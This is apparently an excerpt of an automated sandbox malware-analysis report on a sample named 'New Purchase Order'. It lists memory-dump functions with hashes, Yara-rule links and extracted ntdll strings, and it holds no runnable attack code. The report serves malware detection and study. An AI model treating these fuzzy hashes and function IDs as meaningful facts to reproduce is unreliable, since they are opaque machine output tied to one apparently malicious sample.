                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3cb8b98189ff73d5e39c5ef3e335bc03a5b3348af8e23b55235b7962d8c7fd0b
                                                          • Instruction ID: 0a4bb79bd1401c47fe03717c1f342d2df5f40d19c64169c3f2ee4c4e184b2c9b
                                                          • Opcode Fuzzy Hash: 3cb8b98189ff73d5e39c5ef3e335bc03a5b3348af8e23b55235b7962d8c7fd0b
                                                          • Instruction Fuzzy Hash: 4190023120140907D60071585908707004597D2301F59D411A142C558DD65A8A556226
                                                          Function 01882C60 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8bc2c2be044084bf6893b48090821c49f79f318a1eef59d2c8012e1915c18961
                                                          • Instruction ID: c5ad4c716b35ad0a44b957d0cddeaf47fe06d2c57e4e17c3158cf1cc77b83828
                                                          • Opcode Fuzzy Hash: 8bc2c2be044084bf6893b48090821c49f79f318a1eef59d2c8012e1915c18961
                                                          • Instruction Fuzzy Hash: 0190023120140D46D60071584804B46004597E2301F59C016A112C654DC619CA557626
                                                          Function 01882F90 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5eb8788d2f2e888f085c796ccecd84ffe3a53ae4a93b7cc9de5655b9db6281bd
                                                          • Instruction ID: 94d99f606a976b52f75adeb79427bd36359f4cce27b6acdccc93246272cc8b4e
                                                          • Opcode Fuzzy Hash: 5eb8788d2f2e888f085c796ccecd84ffe3a53ae4a93b7cc9de5655b9db6281bd
                                                          • Instruction Fuzzy Hash: F890023120180906D60071584C1470B004597D2302F59C011A216C555DC6298A556676
                                                          Function 01882FA0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30ac0ffe6dfe27e48fc7b096a40ce9209cf7f12380404f2a52f71ef2ce875936
                                                          • Instruction ID: e0664fad17c2e074a34f2b2f77139716bd3c9a75c3a796186c08bc6cd599f4a8
                                                          • Opcode Fuzzy Hash: 30ac0ffe6dfe27e48fc7b096a40ce9209cf7f12380404f2a52f71ef2ce875936
                                                          • Instruction Fuzzy Hash: EA90023120180906D60071584C08747004597D2302F59C011A616C555EC669CA956636
                                                          Function 01882FB0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a99cbb07df69fa7cfa06808a9d0e1bcd71e255a294dd1243a320eb16afb0bbf7
                                                          • Instruction ID: fbb132b7ea10a337b4c7f24cf79513b0de5ca30e896cedc25276ebe4b035cccd
                                                          • Opcode Fuzzy Hash: a99cbb07df69fa7cfa06808a9d0e1bcd71e255a294dd1243a320eb16afb0bbf7
                                                          • Instruction Fuzzy Hash: EE90022160140546464071688C449064045BBE3311759C121A199C550DC55D8A69576A
                                                          Function 01882FE0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef9234a1c9059309379379cfd33ba3250369315922b56d88947b6b924ea6cfe5
                                                          • Instruction ID: b6cedbde76560966e5ea3630ba8aac8156b7268ec612a6d3725babdf4dd91a72
                                                          • Opcode Fuzzy Hash: ef9234a1c9059309379379cfd33ba3250369315922b56d88947b6b924ea6cfe5
                                                          • Instruction Fuzzy Hash: 16900221211C0546D70075684C14B07004597D2303F59C115A115C554CC9198A655626
                                                          Function 01882F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf5c5a486efd88805995be66a3382b1bbe935f0f46dddddf40f94724a44c6444
                                                          • Instruction ID: 5ec38917a39d10aa92e073067734a52d8d922790faa8c91f973d38aea9b9a576
                                                          • Opcode Fuzzy Hash: bf5c5a486efd88805995be66a3382b1bbe935f0f46dddddf40f94724a44c6444
                                                          • Instruction Fuzzy Hash: 4F90026134140946D60071584814B060045D7E3301F59C015E206C554DC61DCE56622B
                                                          Function 01882F60 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b190b5c59b1a4ad1a9004c5267464508188337a303f232e5d7daf26a7d633f0
                                                          • Instruction ID: 46d03c8491061b7a62e6bcbf56870cc7311b3128088c96dffc6984b2d0e0d123
                                                          • Opcode Fuzzy Hash: 7b190b5c59b1a4ad1a9004c5267464508188337a303f232e5d7daf26a7d633f0
                                                          • Instruction Fuzzy Hash: 3490026121140546D60471584804706008597E3301F59C012A315C554CC52D8E65522A
                                                          Function 01882E80 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19a0387ccb1582c66cfd697c5d7c22310cd3e597c1657110eaa88b36e60fdb5d
                                                          • Instruction ID: 85da451d6cf76f0b3b7eba656aa9e91dcb69f3cc14afd6043bd9b081f40ac957
                                                          • Opcode Fuzzy Hash: 19a0387ccb1582c66cfd697c5d7c22310cd3e597c1657110eaa88b36e60fdb5d
                                                          • Instruction Fuzzy Hash: 5490022160140A06D60171584804616004A97D2341F99C022A202C555ECA298B96A236
                                                          Function 01882EA0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25c41a1996226a98b16a1653af5db3d5fdf06af1df49ae3c75eed5c575462cc5
                                                          • Instruction ID: b9efae5f86612867bd3a417a63da9676b4281de60276697dc3db8cd25fae09d5
                                                          • Opcode Fuzzy Hash: 25c41a1996226a98b16a1653af5db3d5fdf06af1df49ae3c75eed5c575462cc5
                                                          • Instruction Fuzzy Hash: F590027120140906D64071584804746004597D2301F59C011A606C554EC65D8FD9676A
                                                          Function 01882EE0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7868ca598d630e6c5958eac21cfb4247c892e73d13e400167c8b6f38c862c3da
                                                          • Instruction ID: be1b5fddb4bb6a037c775debff061645344e8bb8353c86f6b91932e35d056f42
                                                          • Opcode Fuzzy Hash: 7868ca598d630e6c5958eac21cfb4247c892e73d13e400167c8b6f38c862c3da
                                                          • Instruction Fuzzy Hash: 8B90026120180907D64075584C04607004597D2302F59C011A306C555ECA2D8E55623A
                                                          Function 01882E30 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 371eb6e9cf34aeb8b4dee13304b1865494bad338c60dd75f46b64cfd017c21d1
                                                          • Instruction ID: fa1f55b67ce15a14cd75499017a75e86db99e1c580b35cc08ede9c292ea373a0
                                                          • Opcode Fuzzy Hash: 371eb6e9cf34aeb8b4dee13304b1865494bad338c60dd75f46b64cfd017c21d1
                                                          • Instruction Fuzzy Hash: 0C90022130140906D602715848146060049D7D3345F99C012E242C555DC6298B57A237
                                                          Function 01883090 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ad68cccffc80e2ca4f0e31dbcc4bdf372a8bde5745e0fd2a7839de5f95cbf91d
                                                          • Instruction ID: d43bc00f85bb4cbcab3c0f396f167b4397f49e8a9d2a3aac7973cb5488a6991e
                                                          • Opcode Fuzzy Hash: ad68cccffc80e2ca4f0e31dbcc4bdf372a8bde5745e0fd2a7839de5f95cbf91d
                                                          • Instruction Fuzzy Hash: CE90022124140D06D640715888147070046D7D2701F59C011A102C554DC61A8B6967B6
                                                          Function 01883010 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae910196ef9fe2390b84cfd0944948cd847531b8a83ea699ccd248c9f7c9d468
                                                          • Instruction ID: f9ad920495e6aca92c65bb2b80419d2ef0ba867f813436e1e3670d9f441b6574
                                                          • Opcode Fuzzy Hash: ae910196ef9fe2390b84cfd0944948cd847531b8a83ea699ccd248c9f7c9d468
                                                          • Instruction Fuzzy Hash: 5B90022120184946D64072584C04B0F414597E3302F99C019A515E554CC9198A595726
                                                          Function 018839B0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c88600dd12f579cdf032d753a9a256805b74aa9c5183e9e4b853ddc410a23e0b
                                                          • Instruction ID: 8a145b122f3a89aaae2a6b3b99640108db5dad813a9ea94777269aea3793977f
                                                          • Opcode Fuzzy Hash: c88600dd12f579cdf032d753a9a256805b74aa9c5183e9e4b853ddc410a23e0b
                                                          • Instruction Fuzzy Hash: C690022124545606D650715C48046164045B7E2301F59C021A181C594DC5598A596326
                                                          Function 01883D10 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f9b60d58c31e9b2ae4902a92afc8c84979ba81c867a24796694487336e298eb
                                                          • Instruction ID: 7c9d58db9563a2d82e1deeab9e70a771132ae66340b2f6aebaa6638614772127
                                                          • Opcode Fuzzy Hash: 6f9b60d58c31e9b2ae4902a92afc8c84979ba81c867a24796694487336e298eb
                                                          • Instruction Fuzzy Hash: 8F900231202406469A4072585C04A4E414597E3302B99D415A101D554CC9188A655326
                                                          Function 01883D70 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a5fab7b979868a886d8c50ea71d4c9d6ef1ba1efeb7f434c9c262d03aa36553a
                                                          • Instruction ID: 47dc54f44f827accd10ef2f2ce66682ce7217531be954df800c9cbbc4edc8460
                                                          • Opcode Fuzzy Hash: a5fab7b979868a886d8c50ea71d4c9d6ef1ba1efeb7f434c9c262d03aa36553a
                                                          • Instruction Fuzzy Hash: B690023520140906DA1071585C04646008697D2301F59D411A142C558DC6588AA5A226
                                                          Function 01882C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: dd7a388efa55255c87b8e72e6a65022522827d3b12472d5296db2b8f6eb094db
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:
                                                          Function 01882890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 7b606ec47194a7880d95fdda89e89fd87bfeb947b0f94001990fe80f87f5ce2a
                                                          • Instruction ID: ef321c5d7aa2726b4e1cf3dfeed328d66d4badb9b439e81791db775c53b67d57
                                                          • Opcode Fuzzy Hash: 7b606ec47194a7880d95fdda89e89fd87bfeb947b0f94001990fe80f87f5ce2a
                                                          • Instruction Fuzzy Hash: 2851C4B6A0011AAECF25EB9D88D097EFBB9BB493407148269F4A5D7641D334DF50C7A0
                                                          Function 018F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: fa79c256ec596a69605edc70603c1072c39a2ef642b69f7adaa4e9edbb3de320
                                                          • Instruction ID: bf9ba9ce4cf6d9c55cbea00268c74071acbf52e0a13d27c14f7f1f9c93cf39f1
                                                          • Opcode Fuzzy Hash: fa79c256ec596a69605edc70603c1072c39a2ef642b69f7adaa4e9edbb3de320
                                                          • Instruction Fuzzy Hash: 5051E475A00646AFCF70DF9CC89097EBBFAEB58300B04846DF696D7641E6B4DB408760
                                                          Function 01877630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 018B4725
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 018B4742
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018B46FC
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 018B4655
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 018B4787
                                                          • ExecuteOptions, xrefs: 018B46A0
                                                          • Execute=1, xrefs: 018B4713
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: 8a6192138eb7b4ae2efb821b7189b47f805d32f5d71dd258bcbb3a0b25453199
                                                          • Instruction ID: 4d3167c77c6673fbc8c3c580674b83c2fbf2e208ca5222a4b6155c4e6c12afaa
                                                          • Opcode Fuzzy Hash: 8a6192138eb7b4ae2efb821b7189b47f805d32f5d71dd258bcbb3a0b25453199
                                                          • Instruction Fuzzy Hash: 7A51F73160021EBAEF21AAACDC89FE977A9AF14704F1400A9D605E7281E771EB45CF51
                                                          Function 0188B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: b009429e75514f5ce74d1bcc7dfc8c61d55a91e9c7891159697840acc48aa77f
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: 1B81E070E1524A8FEF25FE6CC8917FEBBB1AFC5364F184219D861E7291C7349A408B51
                                                          Function 018F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: af8c63dd7bb3336869e3018dd73eef3ffad94a8c34610e728ed1d754e1a56a15
                                                          • Instruction ID: 746319fbaea25e6cd9c0d1ff06c149a330c8da8cdfc347c632c91c947a9153ec
                                                          • Opcode Fuzzy Hash: af8c63dd7bb3336869e3018dd73eef3ffad94a8c34610e728ed1d754e1a56a15
                                                          • Instruction Fuzzy Hash: 9521537AA00519ABDB11DE6DCC40AEE7BE9AF54744F48012AEA05D3200E730EB418BA5
                                                          Function 0186F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018B02BD
                                                          • RTL: Re-Waiting, xrefs: 018B031E
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018B02E7
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: 09a6bcb40b1ea1fb9297f4e9efe9430fab0794d42c4677ed3ff92315b26c1937
                                                          • Instruction ID: a2c829073d5ad15376ee73883fb9b39ecd1bc276c4e1eb1bc946636b478a6756
                                                          • Opcode Fuzzy Hash: 09a6bcb40b1ea1fb9297f4e9efe9430fab0794d42c4677ed3ff92315b26c1937
                                                          • Instruction Fuzzy Hash: 86E1BC306087429FE725CF2CD894B6ABBE4AB88314F140A5DF6A5CB3D1D774DA44CB42
                                                          Function 0187BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 018B7B7F
                                                          • RTL: Re-Waiting, xrefs: 018B7BAC
                                                          • RTL: Resource at %p, xrefs: 018B7B8E
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          • Opcode ID: 41de752249df0404783d29a9f2e165e244ea5ea859688e3e005f549750a0f080
                                                          • Instruction ID: 127648429defc3a08f132e949ed1bccf7b6a298ee3ea646183ae330945db2884
                                                          • Opcode Fuzzy Hash: 41de752249df0404783d29a9f2e165e244ea5ea859688e3e005f549750a0f080
                                                          • Instruction Fuzzy Hash: 9841E7313047069FD725DE29C880B6AB7E6EF99B10F100A1DF95AD7780DB31E6058F91
                                                          Function 0187B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018B728C
                                                          Strings
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 018B7294
                                                          • RTL: Re-Waiting, xrefs: 018B72C1
                                                          • RTL: Resource at %p, xrefs: 018B72A3
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: 1f7b673842fe289d5fc4463428f09e35c89264eed53b43c9f94def0c9ff42092
                                                          • Instruction ID: 9c975267ecdc615fd2169b0cd15fd4868fe27ff3ccf037f0e9fa7be288ddbaa6
                                                          • Opcode Fuzzy Hash: 1f7b673842fe289d5fc4463428f09e35c89264eed53b43c9f94def0c9ff42092
                                                          • Instruction Fuzzy Hash: 0941E231700706ABD721DE29CC81BAAB7A6FF95714F140619F956EB380DB31FA4287D1
                                                          Function 018F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: cfc7584fb11e8d378692bfa499d8385cc40895c84172557da023d1fa43981488
                                                          • Instruction ID: ee231af13d78fc5de123d036064a1b9dd5e67dd22bffe585c7f989c17715678a
                                                          • Opcode Fuzzy Hash: cfc7584fb11e8d378692bfa499d8385cc40895c84172557da023d1fa43981488
                                                          • Instruction Fuzzy Hash: AC316472A006199FDB20DE2DCC40BEEB7F9FB54710F44455AE949E3240EB30EB448BA1
                                                          Function 01887D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction ID: 71879c28aaa30ac8f3eb10d791b491f6cffeb9f1cc396c31cf871a75caaefcad
                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction Fuzzy Hash: 8991B271E0021A9BEB24FF6EC8806BEBBB5EF45720F74451AE955E72C4D7309B418B21
                                                          Function 01849126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: db73b40a0214eebd127661224e98ed0d3a0a5ce5fc032fd264fcc33c2a330c02
                                                          • Instruction ID: f4f82ea8dc78f9143f853cd69e1442e3bffbbf82ca1fb5d41624ac94d62a9141
                                                          • Opcode Fuzzy Hash: db73b40a0214eebd127661224e98ed0d3a0a5ce5fc032fd264fcc33c2a330c02
                                                          • Instruction Fuzzy Hash: 0D810A71D012699BDB358B58CC44BEAB7B9AB48754F0041EAEA19F7240D7709F84CFA1
                                                          Function 018CCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 018CCFBD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
